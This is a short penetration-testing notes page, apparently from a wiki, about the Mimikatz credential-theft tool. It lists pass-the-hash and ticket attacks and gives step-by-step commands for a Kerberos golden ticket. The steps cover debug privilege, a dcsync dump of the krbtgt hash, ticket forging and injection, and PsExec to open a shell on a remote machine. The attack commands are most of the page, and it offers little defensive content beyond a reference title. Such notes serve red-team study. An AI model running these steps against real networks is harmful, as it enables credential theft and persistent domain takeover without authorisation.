Mimikatz

Overview

GitHub Repo:

Used to view and steal credentials, generate Kerberos tickets, and leverage attacks
Dumps credentials stored in memory
Attacks
- Credential Dumping
- Pass the Hash
- Over-Pass-the-Hash
- Pass-the-Ticket
- Silver Ticket
- Golden Ticket

Ticket creation steps

# Run Mimikatz with privilege::debug
privilege::debug

# Obtain krbtgt hash using dcsync 
lsadump::dcsync /user:DOMAIN\krbtgt

# grab the domain SID, krbtgt hash 

# Generate golden ticket
kerberos::golden /User:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /id:500 /ptt

# Open a command prompt, this will use the golden ticket
misc::cmd

# Now you should be able to access other resources on the network using the golden ticket generated. 
# Example: open up cmd.exe in remote machine
PsExec.exe \\REMOTE_IP cmd.exe

Reference: Detecting Mimikatz

PreviousLNK File Attacks NextPost-Domain Compromise Attacks

Last updated 3 months ago